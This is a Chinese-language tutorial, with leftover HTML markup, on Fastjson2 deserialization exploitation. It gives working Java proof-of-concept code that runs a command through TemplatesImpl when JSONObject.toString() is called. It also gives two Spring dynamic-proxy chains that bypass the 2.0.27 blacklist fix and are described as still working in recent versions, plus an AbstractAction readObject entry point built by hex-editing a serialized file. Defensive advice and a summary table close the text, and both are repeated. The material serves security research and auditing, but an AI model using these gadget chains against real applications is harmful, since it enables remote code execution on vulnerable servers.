Fastjson2 反序列化漏洞利用链深入分析与教学<\/h2>

文档说明<\/h3>

本文档目标：<\/strong> 深入剖析Fastjson2在特定版本下的反序列化漏洞原理、利用链构造过程、修复方案以及绕过方法。
目标读者：<\/strong> 具备Java安全基础，希望深入理解Fastjson2漏洞细节的安全研究人员、渗透测试人员及开发人员。
技术核心：<\/strong> 利用Fastjson2在序列化（toString<\/code>）过程中自动调用JavaBean的Getter方法的特性，触发恶意代码执行。<\/p>

第一章：基础概念与前置知识<\/h3> 1.1 Fastjson 简介<\/h4> Fastjson是阿里巴巴开源的高性能JSON处理库（序列化与反序列化）。Fastjson2是Fastjson的重要升级版本，在性能和功能上都有显著提升。<\/p> 1.2 反序列化漏洞的本质<\/h4> Java反序列化漏洞的通用利用模式是：通过构造一个特殊的对象链，当该对象被反序列化时，其内部方法（如readObject<\/code>、toString<\/code>、hashCode<\/code>、equals<\/code>或各类Getter方法）的调用链会最终指向执行任意代码的逻辑（例如Runtime.exec<\/code>）。<\/p> 1.3 关键利用类：TemplatesImpl<\/code><\/h4> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/code> 是一个经典的恶意类载体。其核心在于：<\/p> 它有一个 _bytecodes<\/code> 字段，可用于承载自定义的字节码。<\/li> 当它的 getOutputProperties()<\/code> 方法被调用时，会触发加载 _bytecodes<\/code> 中的字节码并实例化，从而执行该字节码的静态代码块中的代码。<\/li> <\/ul> 1.4 Fastjson2 的序列化触发点<\/h4> 与Fastjson1主要关注反序列化（parseObject<\/code>）不同，Fastjson2的很多利用链是通过序列化<\/strong>（如调用JSONObject的 toString()<\/code> 方法）触发的。这是因为在序列化过程中，Fastjson2为了获取对象的属性值，会自动调用该对象的所有Getter方法。<\/p> 第二章：Fastjson2 <= 2.0.26 原生利用链分析<\/h3> 2.1 环境搭建<\/h4> <dependency><\/span> <\/span><\/span> <groupId><\/span>com.alibaba<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>fastjson<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.0.26<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre>2.2 核心PoC代码分析<\/h4> \/\/ 1. 使用Javassist构造恶意字节码 <\/span><\/span><\/span><\/span>ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span>CtClass cc =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"Evil"<\/span>);<\/span> <\/span><\/span>String cmd =<\/span> "java.lang.Runtime.getRuntime().exec(\"open -a Calculator\");"<\/span>;<\/span> <\/span><\/span>cc.<\/span>makeClassInitializer<\/span>().<\/span>insertBefore<\/span>(<\/span>cmd);<\/span> \/\/ 恶意代码放入静态块 <\/span><\/span><\/span><\/span>cc.<\/span>setSuperclass<\/span>(<\/span>pool.<\/span>get<\/span>(<\/span>AbstractTranslet.<\/span>class<\/span>.<\/span>getName<\/span>()));<\/span> <\/span><\/span>byte<\/span>[]<\/span> classBytes =<\/span> cc.<\/span>toBytecode<\/span>();<\/span> <\/span><\/span> <\/span><\/span>\/\/ 2. 组装TemplatesImpl对象 <\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span> <\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>classBytes});<\/span> <\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "fupanc"<\/span>);<\/span> <\/span><\/span>setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 放入JSONObject并触发序列化 <\/span><\/span><\/span><\/span>JSONObject jsonObject =<\/span> new<\/span> JSONObject();<\/span> <\/span><\/span>jsonObject.<\/span>put<\/span>(<\/span>"fupanc"<\/span>,<\/span> templates);<\/span> <\/span><\/span>jsonObject.<\/span>toString<\/span>();<\/span> \/\/ 触发点！ <\/span><\/span><\/span><\/code><\/pre>2.3 调用链详细流程（重点）<\/h4> 入口：<\/strong> JSONObject.toString()<\/code><\/li> 序列化上下文创建：<\/strong> 内部创建 JSONWriter<\/code>（具体实现类为 JSONWriterUTF16JDK8<\/code>）。<\/li> 处理Map条目：<\/strong> JSONWriter<\/code> 会遍历 JSONObject<\/code>（本质是LinkedHashMap<\/code>）的所有键值对。<\/li> 获取ObjectWriter：<\/strong> 当处理到值为 TemplatesImpl<\/code> 类型时，由于没有预定义的序列化器，Fastjson2会动态生成<\/strong>一个序列化器类。<\/li> 动态生成序列化器：<\/strong> 这个过程由 ObjectWriterCreatorASM<\/code> 完成。关键步骤1 - 收集Getter：<\/strong> 通过 BeanUtils.getters()<\/code> 方法，利用反射获取 TemplatesImpl<\/code> 类的所有公有方法，并筛选出符合条件的Getter方法（如 getOutputProperties<\/code>， getStylesheetDOM<\/code>， getTransletIndex<\/code>）。<\/li> 关键步骤2 - 生成字节码：<\/strong> 动态创建一个名为 com.alibaba.fastjson2.writer.OWG_1_3_TemplatesImpl<\/code> 的类。这个类的 write<\/code> 方法包含了调用上述所有Getter方法的逻辑。<\/li> <\/ul> <\/li> 触发执行：<\/strong> 生成的 OWG_1_3_TemplatesImpl<\/code> 类的 write<\/code> 方法被调用，从而调用了 templates.getOutputProperties()<\/code>。<\/li> 代码执行：<\/strong> getOutputProperties()<\/code> 触发 TemplatesImpl<\/code> 加载恶意字节码，执行静态代码块中的 Runtime.getRuntime().exec("open -a Calculator")<\/code>，弹出计算器。<\/li> <\/ol> 调用栈一览：<\/strong><\/p> getOutputProperties:507, TemplatesImpl write:-1, OWG_1_3_TemplatesImpl (动态生成的类) write:548, ObjectWriterImplMap toJSONString:2388, JSON toString:1028, JSONObject main:32, Main <\/code><\/pre> 2.4 动态类的查看<\/h4> 可以使用Arthas等Java诊断工具，在程序运行时反编译生成的 OWG_1_3_TemplatesImpl<\/code> 类，直观看到其调用了多个Getter方法。<\/p> 第三章：官方修复与首次绕过（2.0.27+）<\/h3> 3.1 修复方案<\/h4> 在2.0.27版本中，官方在 BeanUtils.getters()<\/code> 方法中添加了一个黑名单检查<\/strong>。<\/p> 关键代码 (BeanUtils.ignore<\/code>)：<\/strong><\/p> static<\/span> boolean<\/span> ignore<\/span>(<\/span>Class objectClass)<\/span> {<\/span> <\/span><\/span> String name =<\/span> objectClass.<\/span>getName<\/span>();<\/span> <\/span><\/span> switch<\/span> (<\/span>name)<\/span> {<\/span> <\/span><\/span> case<\/span> "javassist.CtNewClass"<\/span>:<\/span> <\/span><\/span> case<\/span> "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>:<\/span> \/\/ 黑名单！ <\/span><\/span><\/span><\/span> case<\/span> "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"<\/span>:<\/span> <\/span><\/span> case<\/span> "org.apache.commons.collections.functors.ChainedTransformer"<\/span>:<\/span> <\/span><\/span> ...<\/span> \/\/ 其他黑名单类 <\/span><\/span><\/span><\/span> return<\/span> true<\/span>;<\/span> <\/span><\/span> default<\/span>:<\/span> <\/span><\/span> return<\/span> false<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>当传入的类（如 TemplatesImpl<\/code>）在黑名单中时，getters()<\/code> 方法直接返回空列表，导致无法为其生成动态序列化器，从而阻断了利用链。<\/p> 3.2 绕过技术：动态代理（JdkDynamicAopProxy）<\/h4> 核心思路：<\/strong> 既然 TemplatesImpl<\/code> 本身被禁，我们可以用一个不被禁的代理类<\/strong>来“包装”它。当Fastjson2处理代理类时，如果能最终触发对 TemplatesImpl<\/code> 的 getOutputProperties<\/code> 调用，即可绕过黑名单。<\/p> 利用类：<\/strong> org.springframework.aop.framework.JdkDynamicAopProxy<\/code>（需要spring-aop<\/code>依赖）<\/p> 绕过原理：<\/strong><\/p> 代理接口：<\/strong> 创建一个实现 javax.xml.transform.Templates<\/code> 接口的代理对象。Templates<\/code> 接口包含了 getOutputProperties<\/code> 方法，且不在黑名单中<\/strong>。<\/li> 目标对象：<\/strong> 将代理的目标对象（TargetSource<\/code>）设置为我们的恶意 TemplatesImpl<\/code> 实例。<\/li> 调用转发：<\/strong> 当Fastjson2调用代理对象的 getOutputProperties()<\/code> 时，会进入 JdkDynamicAopProxy.invoke()<\/code> 方法。在该方法中，如果 AdvisedSupport<\/code> 的配置使得 chain<\/code>（拦截器链）为空，则会直接调用 targetSource.getTarget()<\/code> 返回的真实对象（即我们的 TemplatesImpl<\/code>）的对应方法。 \/\/ JdkDynamicAopProxy.invoke 方法片段 <\/span><\/span><\/span><\/span>if<\/span> (<\/span>chain.<\/span>isEmpty<\/span>())<\/span> {<\/span> <\/span><\/span> ...<\/span> <\/span><\/span> \/\/ 关键行：调用真实目标对象的方法 <\/span><\/span><\/span><\/span> retVal =<\/span> AopUtils.<\/span>invokeJoinpointUsingReflection<\/span>(<\/span>target,<\/span> method,<\/span> args);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> PoC构造步骤：<\/strong><\/p> \/\/ 1. 构造恶意TemplatesImpl (同上) <\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> ...;<\/span> <\/span><\/span> <\/span><\/span>\/\/ 2. 创建AdvisedSupport，设置目标对象 <\/span><\/span><\/span><\/span>AdvisedSupport advisedSupport =<\/span> new<\/span> AdvisedSupport();<\/span> <\/span><\/span>advisedSupport.<\/span>setTarget<\/span>(<\/span>templates);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 创建JdkDynamicAopProxy实例作为InvocationHandler <\/span><\/span><\/span><\/span>Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>);<\/span> <\/span><\/span>Constructor<?><\/span> cons =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>AdvisedSupport.<\/span>class<\/span>);<\/span> <\/span><\/span>cons.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> cons.<\/span>newInstance<\/span>(<\/span>advisedSupport);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 4. 创建代理对象，代理Templates接口 <\/span><\/span><\/span><\/span>Object proxyObj =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>clazz.<\/span>getClassLoader<\/span>(),<\/span> new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> handler);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 5. 放入JSONObject并触发序列化 <\/span><\/span><\/span><\/span>JSONObject jsonObject =<\/span> new<\/span> JSONObject();<\/span> <\/span><\/span>jsonObject.<\/span>put<\/span>(<\/span>"fupanc"<\/span>,<\/span> proxyObj);<\/span> <\/span><\/span>jsonObject.<\/span>toString<\/span>();<\/span> <\/span><\/span><\/code><\/pre>Fastjson2的处理流程（关键）：<\/strong> 当Fastjson2处理代理对象时，在 BeanUtils.getters()<\/code> 中会有一层特殊判断：<\/p> if<\/span> (<\/span>Proxy.<\/span>isProxyClass<\/span>(<\/span>objectClass))<\/span> {<\/span> <\/span><\/span> Class<?>[]<\/span> interfaces =<\/span> objectClass.<\/span>getInterfaces<\/span>();<\/span> <\/span><\/span> if<\/span> (<\/span>interfaces.<\/span>length<\/span> ==<\/span> 1<\/span>)<\/span> {<\/span> \/\/ 注意这个条件！ <\/span><\/span><\/span><\/span> \/\/ 如果是单接口代理，则转而分析该接口 <\/span><\/span><\/span><\/span> return<\/span> getters(<\/span>interfaces[<\/span>0<\/span>],<\/span> methodCache);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 由于我们的代理只实现了 Templates<\/code> 这一个接口，Fastjson2会转而分析 Templates.class<\/code>。<\/li> Templates<\/code> 接口不在黑名单中，且拥有 getOutputProperties<\/code> 方法，因此会成功为其生成动态序列化器。<\/li> 序列化时调用代理对象的Getter，最终通过 JdkDynamicAopProxy<\/code> 触发真实目标 TemplatesImpl<\/code> 的恶意方法。<\/li> <\/ul> 注意点：<\/strong> 如果代理实现了多个接口（new Class[]{Templates.class, AnotherInterface.class}<\/code>），则不会进入上述 if (interfaces.length == 1)<\/code> 分支，Fastjson2会直接分析代理类本身（如 com.sun.proxy.$Proxy0<\/code>）。只要这个代理类本身不在黑名单内，利用链依然可以成功。这为后续绕过提供了更多可能性。<\/p> 第四章：另一种代理利用链（ObjectFactoryDelegatingInvocationHandler）<\/h3> 这是另一个基于Spring的利用链，不依赖 JdkDynamicAopProxy<\/code>。<\/p> 利用类：<\/strong> org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler<\/code>（内部类）<\/p> 利用链：<\/strong><\/p> ObjectFactoryDelegatingInvocationHandler.invoke<\/code> 被调用。<\/li> 它调用其内部维护的 ObjectFactory<\/code> 的 getObject()<\/code> 方法来获取一个对象。<\/li> 然后在这个对象上调用相应的方法。<\/li> <\/ol> PoC构造（两层代理）：<\/strong><\/p> \/\/ 1. 构造恶意TemplatesImpl <\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> ...;<\/span> <\/span><\/span> <\/span><\/span>\/\/ 2. 第一层代理：让JSONObject本身作为InvocationHandler，代理ObjectFactory接口 <\/span><\/span><\/span><\/span>JSONObject jsonObject0 =<\/span> new<\/span> JSONObject();<\/span> <\/span><\/span>jsonObject0.<\/span>put<\/span>(<\/span>"object"<\/span>,<\/span> templates);<\/span> \/\/ 放入恶意对象 <\/span><\/span><\/span>\/\/ 当代理的getObject()方法被调用时，会触发JSONObject的invoke，最终返回map.get("object")，即templates <\/span><\/span><\/span><\/span>Object proxy0 =<\/span> Proxy.<\/span>newProxyInstance<\/span>(...,<\/span> new<\/span> Class[]{<\/span>ObjectFactory.<\/span>class<\/span>},<\/span> (<\/span>InvocationHandler)<\/span>jsonObject0);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 3. 第二层代理：使用ObjectFactoryDelegatingInvocationHandler <\/span><\/span><\/span><\/span>Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"...ObjectFactoryDelegatingInvocationHandler"<\/span>).<\/span>getDeclaredConstructor<\/span>(<\/span>ObjectFactory.<\/span>class<\/span>);<\/span> <\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>InvocationHandler handler1 =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>proxy0);<\/span> <\/span><\/span>\/\/ 代理Templates接口 <\/span><\/span><\/span><\/span>Object proxy1 =<\/span> Proxy.<\/span>newProxyInstance<\/span>(...,<\/span> new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> handler1);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 4. 触发 <\/span><\/span><\/span><\/span>JSONObject finalJson =<\/span> new<\/span> JSONObject();<\/span> <\/span><\/span>finalJson.<\/span>put<\/span>(<\/span>"fupanc"<\/span>,<\/span> proxy1);<\/span> <\/span><\/span>finalJson.<\/span>toString<\/span>();<\/span> <\/span><\/span><\/code><\/pre>流程：<\/strong> Fastjson2处理 proxy1<\/code> (代理了Templates<\/code>) -> 调用 getOutputProperties<\/code> -> 触发 ObjectFactoryDelegatingInvocationHandler.invoke<\/code> -> 调用 proxy0.getObject()<\/code>（即 ObjectFactory.getObject()<\/code>）-> 触发 JSONObject.invoke<\/code> -> 返回 templates<\/code> -> 在 templates<\/code> 上调用 getOutputProperties<\/code> -> 代码执行。<\/p> 第五章：新型反序列化入口点（AbstractAction）<\/h3> 当常见的入口点（如 HashMap<\/code>、BadAttributeValueExpException<\/code>）被限制时，可以寻找其他可序列化类的 readObject<\/code> 方法作为新入口。<\/p> 利用类：<\/strong> javax.swing.AbstractAction<\/code> 及其子类（如 StyledEditorKit.AlignmentAction<\/code>）<\/p> 利用链：<\/strong><\/p> AlignmentAction.readObject() -> AbstractAction.putValue() -> AbstractAction.firePropertyChange() -> XString.equals() -> JSONObject.toString() -> ... (后续Fastjson2利用链) <\/code><\/pre> 构造技巧（难点）：<\/strong> firePropertyChange(key, oldValue, newValue)<\/code> 方法中会调用 oldValue.equals(newValue)<\/code>。我们需要：<\/p> oldValue<\/code>：设置为 com.sun.org.apache.xpath.internal.objects.XString<\/code> 实例。<\/li> newValue<\/code>：设置为包含我们恶意代理对象的 JSONObject<\/code>。当 XString<\/code> 的 equals<\/code> 方法被调用时，会触发参数的 toString()<\/code> 方法，从而启动Fastjson2的序列化流程。<\/li> <\/ul> 特殊处理：<\/strong> 由于在序列化时，ArrayTable<\/code> 的 put<\/code> 方法会覆盖相同key的值，导致反序列化时 oldValue<\/code> 获取不正确。文章提出了一种巧妙的十六进制编辑<\/strong>方法：<\/p> 正常生成一个包含两个不同key的序列化文件（key1=XString<\/code>, key2=JSONObject<\/code>）。<\/li> 用十六进制编辑器将第一个key的字符改为与第二个key相同。这样在反序列化时，arrayTable.get(key)<\/code> 会返回第一个值（XString<\/code>），但后续 put<\/code> 操作会覆盖为第二个值（JSONObject<\/code>），从而在 firePropertyChange<\/code> 时成功触发 XString.equals(JSONObject)<\/code>。<\/li> <\/ol> 第六章：总结与防护建议<\/h3> 6.1 漏洞总结表<\/h4> 特性<\/th> Fastjson2 <= 2.0.26 (原生链)<\/th> JdkDynamicAopProxy 绕过<\/th> ObjectFactoryDelegatingInvocationHandler 绕过<\/th> <\/tr> <\/thead> 触发方式<\/strong><\/td> JSONObject.toString()<\/code><\/td> JSONObject.toString()<\/code><\/td> JSONObject.toString()<\/code><\/td> <\/tr> 核心类<\/strong><\/td> TemplatesImpl<\/code><\/td> TemplatesImpl<\/code> + JdkDynamicAopProxy<\/code><\/td> TemplatesImpl<\/code> + ObjectFactoryDelegatingInvocationHandler<\/code> + JSONObject<\/code><\/td> <\/tr> 关键点<\/strong><\/td> 动态生成序列化器调用Getter<\/td> 动态代理绕过黑名单检查<\/td> 两层代理，利用ObjectFactory<\/code>接口<\/td> <\/tr> 依赖<\/strong><\/td> Fastjson2 <= 2.0.26<\/td> Fastjson2 + spring-aop<\/td> Fastjson2 + spring-beans (通常包含在spring-aop中)<\/td> <\/tr> 修复影响<\/strong><\/td> 2.0.27 通过黑名单修复<\/td> 直至最新版(如2.0.58)仍可利用<\/strong><\/td> 直至最新版(如2.0.58)仍可利用<\/strong><\/td> <\/tr> <\/tbody> <\/table> 6.2 安全建议<\/h4> 升级Fastjson2：<\/strong> 始终使用最新版本的Fastjson2。<\/li> 安全配置：<\/strong> 如果无法升级，务必使用SafeMode功能（JSONFactory.setSafeMode(true)<\/code>），这是最根本的防护措施。<\/li> 谨慎反序列化：<\/strong> 绝对不要反序列化来自不可信源的JSON数据。<\/li> JVM防护：<\/strong> 使用JVM安全管理器或RASP方案进行防护。<\/li> 代码审计：<\/strong> 检查项目中是否存在将用户可控数据直接传入 JSONObject.toString()<\/code> 或类似序列化方法的代码。<\/li> <\/ol> 通过本教学文档，您应该能够全面理解Fastjson2反序列化漏洞的多种利用技术及其演变过程。这些知识对于进行有效的代码安全审计和构建防御体系至关重要。<\/p>

特性<\/th>	Fastjson2 <= 2.0.26 (原生链)<\/th>	JdkDynamicAopProxy 绕过<\/th>	ObjectFactoryDelegatingInvocationHandler 绕过<\/th> <\/tr> <\/thead>
触发方式<\/strong><\/td>	`JSONObject.toString()<\/code><\/td>`	`JSONObject.toString()<\/code><\/td>`	`JSONObject.toString()<\/code><\/td> <\/tr>`
核心类<\/strong><\/td>	`TemplatesImpl<\/code><\/td>`	`TemplatesImpl<\/code> + JdkDynamicAopProxy<\/code><\/td>`	`TemplatesImpl<\/code> + ObjectFactoryDelegatingInvocationHandler<\/code> + JSONObject<\/code><\/td> <\/tr>`
关键点<\/strong><\/td>	动态生成序列化器调用Getter<\/td>	动态代理绕过黑名单检查<\/td>	两层代理，利用`ObjectFactory<\/code>接口<\/td> <\/tr>`
依赖<\/strong><\/td>	Fastjson2 <= 2.0.26<\/td>	Fastjson2 + spring-aop<\/td>	Fastjson2 + spring-beans (通常包含在spring-aop中)<\/td> <\/tr>
修复影响<\/strong><\/td>	2.0.27 通过黑名单修复<\/td>	直至最新版(如2.0.58)仍可利用<\/strong><\/td>	直至最新版(如2.0.58)仍可利用<\/strong><\/td> <\/tr> <\/tbody> <\/table> 6.2 安全建议<\/h4> 升级Fastjson2：<\/strong> 始终使用最新版本的Fastjson2。<\/li> 安全配置：<\/strong> 如果无法升级，务必使用SafeMode功能（`JSONFactory.setSafeMode(true)<\/code>），这是最根本的防护措施。<\/li>` `谨慎反序列化：<\/strong> 绝对不要反序列化来自不可信源的JSON数据。<\/li>` `JVM防护：<\/strong> 使用JVM安全管理器或RASP方案进行防护。<\/li>` `代码审计：<\/strong> 检查项目中是否存在将用户可控数据直接传入 JSONObject.toString()<\/code> 或类似序列化方法的代码。<\/li> <\/ol> 通过本教学文档，您应该能够全面理解Fastjson2反序列化漏洞的多种利用技术及其演变过程。这些知识对于进行有效的代码安全审计和构建防御体系至关重要。<\/p>`